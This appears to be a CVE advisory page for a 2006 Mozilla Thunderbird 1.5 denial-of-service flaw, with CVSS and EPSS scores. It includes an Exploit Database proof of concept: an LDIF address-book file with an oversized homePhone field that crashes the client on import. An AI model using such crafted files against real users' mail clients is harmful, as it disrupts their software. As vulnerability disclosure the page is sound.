Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
2.6 |
|
AV:N/AC:H/Au:N/C:N/I:N/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 27246
Publication date : 2006-02-16 23h00 +00:00
Author : DrFrancky
EDB Verified : Yes
source: https://www.securityfocus.com/bid/16716/info
Mozilla Thunderbird is prone to a remote denial-of-service vulnerability.
The issue presents itself when the application handles a specially crafted address book file.
Mozilla Thunderbird 1.5 is reportedly affected by this issue. Other versions may be vulnerable as well.
POC: create a file.ldif and insert following then import it in address book:
n: cn=Test POC by
[email protected],
[email protected]
objectclass: top
objectclass: person
objectclass: organizationalPerson
objectclass: inetOrgPerson
objectclass: mozillaAbPersonAlpha
givenName: Test
sn: POC by
[email protected]
cn: POC by
[email protected]
mozillaNickname: DrFrancky
mail:
[email protected]
nsAIMid: DrFrancky POC
modifytimestamp: 0Z
homePhone: aaaaaaaaaaaaaaa[2MB of 'a']
Products Mentioned
Configuraton 0
Mozilla>>Thunderbird >> Version 1.5
References